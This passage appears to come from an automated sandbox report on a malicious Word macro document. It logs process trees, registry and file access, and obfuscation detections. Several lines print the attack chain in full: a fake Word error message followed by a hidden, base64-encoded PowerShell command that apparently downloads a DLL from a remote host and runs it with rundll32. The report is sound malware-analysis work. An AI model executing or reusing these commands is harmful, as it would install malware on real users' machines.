AGwAYQAnACsAJwB1AGcAJwApACsAJwBoACcAKwAoACcAcwAnACsAJwAuAG8AcgBnACcAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACcAKAAnACsAKAAnAHMAJwArACcAbQBhAGwAbAAnACkAKwAnAHAAJwArACgAJwBvAHQAYQAnACsAJwB0AG8AZQAnACkAKwAoACgAJwBzAEoAKQAnACsAJwAoADMAJwApACkAK
Source: unknown	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll #1
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll #1
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lkvi\ejqhpm.twa',RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yffe\xmxs.xtt',RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yxkq\vxcyp.vst',RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Glql\mritqo.dtl',RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xlll\midsk.ptl',RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qpvq\ojxkj.pqe',RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qfbx\wpmmbwy.jek',RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ljbn\kwuw.ehe',RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ghjb\hjdxzl.ejj',RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Doth\isebmn.lpx',RunDLL
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEYAMgBPAE0AWQBqACAAIAA9ACAAWwB0AFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIAIAAtAEYAIAAnAFkAUwB0AGUAJwAsACcARABJAHIAZQBjAFQAbwByAFkAJwAsACcAcwAnACwAJwBNAC4ASQBPAC4AJwApADsAIAAgACAAJAAwAFMASAAxAGcAMwAgACAAPQAgAFsAVABZAHAARQBdACgAIgB7ADMAfQB7ADAAfQB7ADIAfQB7ADEAfQB7ADQAfQAiAC0ARgAnAEUAVAAuACcALAAnAGMARQBwAE8ASQBuAFQAbQAnACwAJwBzAGUAcgBWAGkAJwAsACcAcwB5AHMAdABlAE0ALgBuACcALAAnAEEATgBhAEcAZQBSACcAKQAgACAAOwAgACAAJABXAHUAbAB3AHkAdwBkAD0AKAAoACcAVQAnACsAJwBmAGEAJwApACsAKAAnAG8AcAAnACsAJwB2ACcAKQArACcAbQAnACkAOwAkAEMANgA3AHkAdgBwAF8APQAkAEcAZwBsAGgAMgBsAGkAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEUAMgBjAGkAeABoAGwAOwAkAFMAOAA1AGEAZABvAGQAPQAoACgAJwBJACcAKwAnAGYAbQAnACkAKwAnADAAJwArACgAJwBuACcAKwAnAHEANAAnACkAKQA7ACAAKABsAHMAIAAoACcAdgBBAHIAaQBhACcAKwAnAGIATABlADoAZgAnACsAJwAyAG8AJwArACcATQB5AEoAJwApACAAKQAuAFYAQQBsAHUAZQA6ADoAIgBjAFIAYABFAGAAQQBgAFQAZQBkAEkAcgBlAGMAVABvAHIAWQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcANABxADcAQgBxACcAKwAnAHAAZQAnACkAKwAoACcAZQBuACcAKwAnADYAJwApACsAKAAnADQAcQA3AEIAJwArACcAYgAnACsAJwBzACcAKQArACgAJwA1AHcAXwAnACsAJwBlACcAKQArACgAJwA0AHEAJwArACcANwAnACkAKQAtAFIARQBwAEwAYQBDAEUAKAAnADQAcQAnACsAJwA3ACcAKQAsAFsAYwBoAGEAUgBdADkAMgApACkAOwAkAFMAbAB1AHEAegA4AGkAPQAoACgAJwBJACcAKwAnAGsAcQA4AHUAJwApACsAJwA3AHgAJwApADsAIAAgACgARwBlAHQALQB2AEEAcgBJAEEAQgBsAEUAIAAoACIAMAAiACsAIgBTAEgAMQAiACsAIgBnADMAIgApACAALQBWAEEATAB1AGUAbwBuAGwAIAAgACkAOgA6ACIAcwBFAGAAYwBgAFUAcgBpAFQAeQBwAHIAbwBUAE8AYwBgAG8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzADEAJwArACcAMgAnACkAKQA7ACQAVwA3AHkAcwAzAGwAZAA9ACgAKAAnAEIANwAnACsAJwA3AHYAJwApACsAKAAnADAAawAnACsAJwB5ACcAKQApADsAJABLAGEAMABlAGsAZgBhACAAPQAgACgAKAAnAFkAdgB0AGwAJwArACcAeAAnACkAKwAnADYAcAAnACsAJwA0ACcAKQA7ACQASAB6ADUAOQBnADcAcgA9ACgAKAAnAFUAZQAnACsAJwByACcAKQArACgAJwA0ACcAKwAnAGwAMQAnACkAKwAnAHAAJwApADsAJABTAG4ANABiAHgAdQBiAD0AKAAnAFQAMAAnACsAJwBfACcAKwAoACcAbgBsACcAKwAnADkAXwAnACkAKQA7ACQAUABpADkAbgB5AGYAcQA9ACQASABPAE0ARQArACgAKAAoACcAQgBEACcAKwAnAHkAJwApACsAKAAnAEIAcQAnACsAJwBwAGUAZQBuACcAKQArACcANgAnACsAKAAnAEIARAB5ACcAKwAnAEIAYgAnACkAKwAnAHMANQAnACsAKAAnAHcAJwArACcAXwBlAEIARAB5ACcAKQApAC4AIgByAGUAYABQAEwAYQBDAGUAIgAoACgAJwBCACcAKwAnAEQAeQAnACkALAAnAFwAJwApACkAKwAkAEsAYQAwAGUAawBmAGEAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFcANAByAHcAagA5ADgAPQAoACgAJwBLACcAKwAnAGIAaABnACcAKQArACcAZwAnACsAJwA5AHgAJwApADsAJABOAG0AOQBkAGMAdABuAD0ATgBFAFcALQBgAG8AYgBgAGoAZQBgAGMAVAAgAE4ARQBUAC4AVwBFAEIAYwBsAGkARQBOAHQAOwAkAEMAawA4ADEAeAB4ADIAPQAoACgAJwBoACcAKwAoACcAdAAnACsAJwB0AHAAOgBKACcAKQArACgAKAAnACkAJwArACcAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAJwArACcAKQAoAGIAaQBnACcAKQApACsAKAAnAGwAYQAnACsAJwB1AGcAJwApACsAJwBoACcAKwAoACcAcwAnACsAJwAuAG8AcgBnACcAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACcAKAAnACsAKAAnAHMAJwArACcAbQBhAGwAbAAnACkAKwAnAHAAJwArACgAJwBvAHQAYQAnACsAJwB0AG8AZQAnACkAKwAoACgAJwBzAEoAKQAnACsAJwAoADMAJwApACkAK	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll #1	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll #1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lkvi\ejqhpm.twa',RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yffe\xmxs.xtt',RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yxkq\vxcyp.vst',RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Glql\mritqo.dtl',RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xlll\midsk.ptl',RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qpvq\ojxkj.pqe',RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qfbx\wpmmbwy.jek',RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ljbn\kwuw.ehe',RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ghjb\hjdxzl.ejj',RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Doth\isebmn.lpx',RunDLL

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Window found: window name: SysTabControl32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2094362425.0000000002DD7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2094362425.0000000002DD7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2094362425.0000000002DD7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2094362425.0000000002DD7000.00000004.00000040.sdmp
Source:	Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2094362425.0000000002DD7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2094362425.0000000002DD7000.00000004.00000040.sdmp
Source:	Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2094179270.0000000002AE0000.00000002.00000001.sdmp

Source: Doc.doc

Initial sample: OLE summary subject = fuchsia Health & Industrial copying PNG National Handcrafted Plastic Towels utilize Baby & Grocery interface array

Data Obfuscation:

Document contains an embedded VBA with many GOTO operations indicating source code obfuscation

Show sources

Source: Doc.doc	Stream path 'Macros/VBA/Qfepbztq9r8o1l76' : High number of GOTO operations
Source: VBA code instrumentation	OLE, VBA macro, High number of GOTO operations: Module Qfepbztq9r8o1l76			Name: Qfepbztq9r8o1l76

PowerShell case anomaly found

Show sources

Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD IAAkAEYAMgBPAE0AWQBqACAAIAA9ACAAWwB0AFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIAIAAtAEYAIAAnAFkAUwB0AGUAJwAsACcARABJAHIAZQBjAFQAbwByAFkAJwAsACcAcwAnACwAJwBNAC4ASQBPAC4AJwApADsAIAAgACAAJAAwAFMASAAxAGcAMwAgACAAPQAgAFsAVABZAHAARQBdACgAIgB7ADMAfQB7ADAAfQB7ADIAfQB7ADEAfQB7ADQAfQAiAC0ARgAnAEUAVAAuACcALAAnAGMARQBwAE8ASQBuAFQAbQAnACwAJwBzAGUAcgBWAGkAJwAsACcAcwB5AHMAdABlAE0ALgBuACcALAAnAEEATgBhAEcAZQBSACcAKQAgACAAOwAgACAAJABXAHUAbAB3AHkAdwBkAD0AKAAoACcAVQAnACsAJwBmAGEAJwApACsAKAAnAG8AcAAnACsAJwB2ACcAKQArACcAbQAnACkAOwAkAEMANgA3AHkAdgBwAF8APQAkAEcAZwBsAGgAMgBsAGkAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEUAMgBjAGkAeABoAGwAOwAkAFMAOAA1AGEAZABvAGQAPQAoACgAJwBJACcAKwAnAGYAbQAnACkAKwAnADAAJwArACgAJwBuACcAKwAnAHEANAAnACkAKQA7ACAAKABsAHMAIAAoACcAdgBBAHIAaQBhACcAKwAnAGIATABlADoAZgAnACsAJwAyAG8AJwArACcATQB5AEoAJwApACAAKQAuAFYAQQBsAHUAZQA6ADoAIgBjAFIAYABFAGAAQQBgAFQAZQBkAEkAcgBlAGMAVABvAHIAWQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcANABxADcAQgBxACcAKwAnAHAAZQAnACkAKwAoACcAZQBuACcAKwAnADYAJwApACsAKAAnADQAcQA3AEIAJwArACcAYgAnACsAJwBzACcAKQArACgAJwA1AHcAXwAnACsAJwBlACcAKQArACgAJwA0AHEAJwArACcANwAnACkAKQAtAFIARQBwAEwAYQBDAEUAKAAnADQAcQAnACsAJwA3ACcAKQAsAFsAYwBoAGEAUgBdADkAMgApACkAOwAkAFMAbAB1AHEAegA4AGkAPQAoACgAJwBJACcAKwAnAGsAcQA4AHUAJwApACsAJwA3AHgAJwApADsAIAAgACgARwBlAHQALQB2AEEAcgBJAEEAQgBsAEUAIAAoACIAMAAiACsAIgBTAEgAMQAiACsAIgBnADMAIgApACAALQBWAEEATAB1AGUAbwBuAGwAIAAgACkAOgA6ACIAcwBFAGAAYwBgAFUAcgBpAFQAeQBwAHIAbwBUAE8AYwBgAG8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzADEAJwArACcAMgAnACkAKQA7ACQAVwA3AHkAcwAzAGwAZAA9ACgAKAAnAEIANwAnACsAJwA3AHYAJwApACsAKAAnADAAawAnACsAJwB5ACcAKQApADsAJABLAGEAMABlAGsAZgBhACAAPQAgACgAKAAnAFkAdgB0AGwAJwArACcAeAAnACkAKwAnADYAcAAnACsAJwA0ACcAKQA7ACQASAB6ADUAOQBnADcAcgA9ACgAKAAnAFUAZQAnACsAJwByACcAKQArACgAJwA0ACcAKwAnAGwAMQAnACkAKwAnAHAAJwApADsAJABTAG4ANABiAHgAdQBiAD0AKAAnAFQAMAAnACsAJwBfACcAKwAoACcAbgBsACcAKwAnADkAXwAnACkAKQA7ACQAUABpADkAbgB5AGYAcQA9ACQASABPAE0ARQArACgAKAAoACcAQgBEACcAKwAnAHkAJwApACsAKAAnAEIAcQAnACsAJwBwAGUAZQBuACcAKQArACcANgAnACsAKAAnAEIARAB5ACcAKwAnAEIAYgAnACkAKwAnAHMANQAnACsAKAAnAHcAJwArACcAXwBlAEIARAB5ACcAKQApAC4AIgByAGUAYABQAEwAYQBDAGUAIgAoACgAJwBCACcAKwAnAEQAeQAnACkALAAnAFwAJwApACkAKwAkAEsAYQAwAGUAawBmAGEAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFcANAByAHcAagA5ADgAPQAoACgAJwBLACcAKwAnAGIAaABnACcAKQArACcAZwAnACsAJwA5AHgAJwApADsAJABOAG0AOQBkAGMAdABuAD0ATgBFAFcALQBgAG8AYgBgAGoAZQBgAGMAVAAgAE4ARQBUAC4AVwBFAEIAYwBsAGkARQBOAHQAOwAkAEMAawA4ADEAeAB4ADIAPQAoACgAJwBoACcAKwAoACcAdAAnACsAJwB0AHAAOgBKACcAKQArACgAKAAnACkAJwArACcAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAJwArACcAKQAoAGIAaQBnACcAKQApACsAKAAnAGwAYQAnACsAJwB1AGcAJwApACsAJwBoACcAKwAoACcAcwAnACsAJwAuAG8AcgBnACcAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACcAKAAnACsAKAAnAHMAJwArACcAbQBhAGwAbAAnACkAKwAnAHAAJwArACgAJwBvAHQAYQAnA
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEYAMgBPAE0AWQBqACAAIAA9ACAAWwB0AFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIAIAAtAEYAIAAnAFkAUwB0AGUAJwAsACcARABJAHIAZQBjAFQAbwByAFkAJwAsACcAcwAnACwAJwBNAC4ASQBPAC4AJwApADsAIAAgACAAJAAwAFMASAAxAGcAMwAgACAAPQAgAFsAVABZAHAARQBdACgAIgB7ADMAfQB7ADAAfQB7ADIAfQB7ADEAfQB7ADQAfQAiAC0ARgAnAEUAVAAuACcALAAnAGMARQBwAE8ASQBuAFQAbQAnACwAJwBzAGUAcgBWAGkAJwAsACcAcwB5AHMAdABlAE0ALgBuACcALAAnAEEATgBhAEcAZQBSACcAKQAgACAAOwAgACAAJABXAHUAbAB3AHkAdwBkAD0AKAAoACcAVQAnACsAJwBmAGEAJwApACsAKAAnAG8AcAAnACsAJwB2ACcAKQArACcAbQAnACkAOwAkAEMANgA3AHkAdgBwAF8APQAkAEcAZwBsAGgAMgBsAGkAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEUAMgBjAGkAeABoAGwAOwAkAFMAOAA1AGEAZABvAGQAPQAoACgAJwBJACcAKwAnAGYAbQAnACkAKwAnADAAJwArACgAJwBuACcAKwAnAHEANAAnACkAKQA7ACAAKABsAHMAIAAoACcAdgBBAHIAaQBhACcAKwAnAGIATABlADoAZgAnACsAJwAyAG8AJwArACcATQB5AEoAJwApACAAKQAuAFYAQQBsAHUAZQA6ADoAIgBjAFIAYABFAGAAQQBgAFQAZQBkAEkAcgBlAGMAVABvAHIAWQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcANABxADcAQgBxACcAKwAnAHAAZQAnACkAKwAoACcAZQBuACcAKwAnADYAJwApACsAKAAnADQAcQA3AEIAJwArACcAYgAnACsAJwBzACcAKQArACgAJwA1AHcAXwAnACsAJwBlACcAKQArACgAJwA0AHEAJwArACcANwAnACkAKQAtAFIARQBwAEwAYQBDAEUAKAAnADQAcQAnACsAJwA3ACcAKQAsAFsAYwBoAGEAUgBdADkAMgApACkAOwAkAFMAbAB1AHEAegA4AGkAPQAoACgAJwBJACcAKwAnAGsAcQA4AHUAJwApACsAJwA3AHgAJwApADsAIAAgACgARwBlAHQALQB2AEEAcgBJAEEAQgBsAEUAIAAoACIAMAAiACsAIgBTAEgAMQAiACsAIgBnADMAIgApACAALQBWAEEATAB1AGUAbwBuAGwAIAAgACkAOgA6ACIAcwBFAGAAYwBgAFUAcgBpAFQAeQBwAHIAbwBUAE8AYwBgAG8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzADEAJwArACcAMgAnACkAKQA7ACQAVwA3AHkAcwAzAGwAZAA9ACgAKAAnAEIANwAnACsAJwA3AHYAJwApACsAKAAnADAAawAnACsAJwB5ACcAKQApADsAJABLAGEAMABlAGsAZgBhACAAPQAgACgAKAAnAFkAdgB0AGwAJwArACcAeAAnACkAKwAnADYAcAAnACsAJwA0ACcAKQA7ACQASAB6ADUAOQBnADcAcgA9ACgAKAAnAFUAZQAnACsAJwByACcAKQArACgAJwA0ACcAKwAnAGwAMQAnACkAKwAnAHAAJwApADsAJABTAG4ANABiAHgAdQBiAD0AKAAnAFQAMAAnACsAJwBfACcAKwAoACcAbgBsACcAKwAnADkAXwAnACkAKQA7ACQAUABpADkAbgB5AGYAcQA9ACQASABPAE0ARQArACgAKAAoACcAQgBEACcAKwAnAHkAJwApACsAKAAnAEIAcQAnACsAJwBwAGUAZQBuACcAKQArACcANgAnACsAKAAnAEIARAB5ACcAKwAnAEIAYgAnACkAKwAnAHMANQAnACsAKAAnAHcAJwArACcAXwBlAEIARAB5ACcAKQApAC4AIgByAGUAYABQAEwAYQBDAGUAIgAoACgAJwBCACcAKwAnAEQAeQAnACkALAAnAFwAJwApACkAKwAkAEsAYQAwAGUAawBmAGEAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFcANAByAHcAagA5ADgAPQAoACgAJwBLACcAKwAnAGIAaABnACcAKQArACcAZwAnACsAJwA5AHgAJwApADsAJABOAG0AOQBkAGMAdABuAD0ATgBFAFcALQBgAG8AYgBgAGoAZQBgAGMAVAAgAE4ARQBUAC4AVwBFAEIAYwBsAGkARQBOAHQAOwAkAEMAawA4ADEAeAB4ADIAPQAoACgAJwBoACcAKwAoACcAdAAnACsAJwB0AHAAOgBKACcAKQArACgAKAAnACkAJwArACcAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAJwArACcAKQAoAGIAaQBnACcAKQApACsAKAAnAGwAYQAnACsAJwB1AGcAJwApACsAJwBoACcAKwAoACcAcwAnACsAJwAuAG8AcgBnACcAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACcAKAAnACsAKAAnAHMAJwArACcAbQBhAGwAbAAnACkAKwAnAHAAJwArACgAJwBvAHQAYQAnACsAJwB0AG8AZQAnACkAKwAoACgAJwBzAEoAKQAnACsAJwAoADMAJwApACkAK
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEYAMgBPAE0AWQBqACAAIAA9ACAAWwB0AFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIAIAAtAEYAIAAnAFkAUwB0AGUAJwAsACcARABJAHIAZQBjAFQAbwByAFkAJwAsACcAcwAnACwAJwBNAC4ASQBPAC4AJwApADsAIAAgACAAJAAwAFMASAAxAGcAMwAgACAAPQAgAFsAVABZAHAARQBdACgAIgB7ADMAfQB7ADAAfQB7ADIAfQB7ADEAfQB7ADQAfQAiAC0ARgAnAEUAVAAuACcALAAnAGMARQBwAE8ASQBuAFQAbQAnACwAJwBzAGUAcgBWAGkAJwAsACcAcwB5AHMAdABlAE0ALgBuACcALAAnAEEATgBhAEcAZQBSACcAKQAgACAAOwAgACAAJABXAHUAbAB3AHkAdwBkAD0AKAAoACcAVQAnACsAJwBmAGEAJwApACsAKAAnAG8AcAAnACsAJwB2ACcAKQArACcAbQAnACkAOwAkAEMANgA3AHkAdgBwAF8APQAkAEcAZwBsAGgAMgBsAGkAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEUAMgBjAGkAeABoAGwAOwAkAFMAOAA1AGEAZABvAGQAPQAoACgAJwBJACcAKwAnAGYAbQAnACkAKwAnADAAJwArACgAJwBuACcAKwAnAHEANAAnACkAKQA7ACAAKABsAHMAIAAoACcAdgBBAHIAaQBhACcAKwAnAGIATABlADoAZgAnACsAJwAyAG8AJwArACcATQB5AEoAJwApACAAKQAuAFYAQQBsAHUAZQA6ADoAIgBjAFIAYABFAGAAQQBgAFQAZQBkAEkAcgBlAGMAVABvAHIAWQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcANABxADcAQgBxACcAKwAnAHAAZQAnACkAKwAoACcAZQBuACcAKwAnADYAJwApACsAKAAnADQAcQA3AEIAJwArACcAYgAnACsAJwBzACcAKQArACgAJwA1AHcAXwAnACsAJwBlACcAKQArACgAJwA0AHEAJwArACcANwAnACkAKQAtAFIARQBwAEwAYQBDAEUAKAAnADQAcQAnACsAJwA3ACcAKQAsAFsAYwBoAGEAUgBdADkAMgApACkAOwAkAFMAbAB1AHEAegA4AGkAPQAoACgAJwBJACcAKwAnAGsAcQA4AHUAJwApACsAJwA3AHgAJwApADsAIAAgACgARwBlAHQALQB2AEEAcgBJAEEAQgBsAEUAIAAoACIAMAAiACsAIgBTAEgAMQAiACsAIgBnADMAIgApACAALQBWAEEATAB1AGUAbwBuAGwAIAAgACkAOgA6ACIAcwBFAGAAYwBgAFUAcgBpAFQAeQBwAHIAbwBUAE8AYwBgAG8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzADEAJwArACcAMgAnACkAKQA7ACQAVwA3AHkAcwAzAGwAZAA9ACgAKAAnAEIANwAnACsAJwA3AHYAJwApACsAKAAnADAAawAnACsAJwB5ACcAKQApADsAJABLAGEAMABlAGsAZgBhACAAPQAgACgAKAAnAFkAdgB0AGwAJwArACcAeAAnACkAKwAnADYAcAAnACsAJwA0ACcAKQA7ACQASAB6ADUAOQBnADcAcgA9ACgAKAAnAFUAZQAnACsAJwByACcAKQArACgAJwA0ACcAKwAnAGwAMQAnACkAKwAnAHAAJwApADsAJABTAG4ANABiAHgAdQBiAD0AKAAnAFQAMAAnACsAJwBfACcAKwAoACcAbgBsACcAKwAnADkAXwAnACkAKQA7ACQAUABpADkAbgB5AGYAcQA9ACQASABPAE0ARQArACgAKAAoACcAQgBEACcAKwAnAHkAJwApACsAKAAnAEIAcQAnACsAJwBwAGUAZQBuACcAKQArACcANgAnACsAKAAnAEIARAB5ACcAKwAnAEIAYgAnACkAKwAnAHMANQAnACsAKAAnAHcAJwArACcAXwBlAEIARAB5ACcAKQApAC4AIgByAGUAYABQAEwAYQBDAGUAIgAoACgAJwBCACcAKwAnAEQAeQAnACkALAAnAFwAJwApACkAKwAkAEsAYQAwAGUAawBmAGEAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFcANAByAHcAagA5ADgAPQAoACgAJwBLACcAKwAnAGIAaABnACcAKQArACcAZwAnACsAJwA5AHgAJwApADsAJABOAG0AOQBkAGMAdABuAD0ATgBFAFcALQBgAG8AYgBgAGoAZQBgAGMAVAAgAE4ARQBUAC4AVwBFAEIAYwBsAGkARQBOAHQAOwAkAEMAawA4ADEAeAB4ADIAPQAoACgAJwBoACcAKwAoACcAdAAnACsAJwB0AHAAOgBKACcAKQArACgAKAAnACkAJwArACcAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAJwArACcAKQAoAGIAaQBnACcAKQApACsAKAAnAGwAYQAnACsAJwB1AGcAJwApACsAJwBoACcAKwAoACcAcwAnACsAJwAuAG8AcgBnACcAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACcAKAAnACsAKAAnAHMAJwArACcAbQBhAGwAbAAnACkAKwAnAHAAJwArACgAJwBvAHQAYQAnACsAJwB0AG8AZQAnACkAKwAoACgAJwBzAEoAKQAnACsAJwAoADMAJwApACkAK	Jump to behavior

Suspicious powershell command line found

Show sources

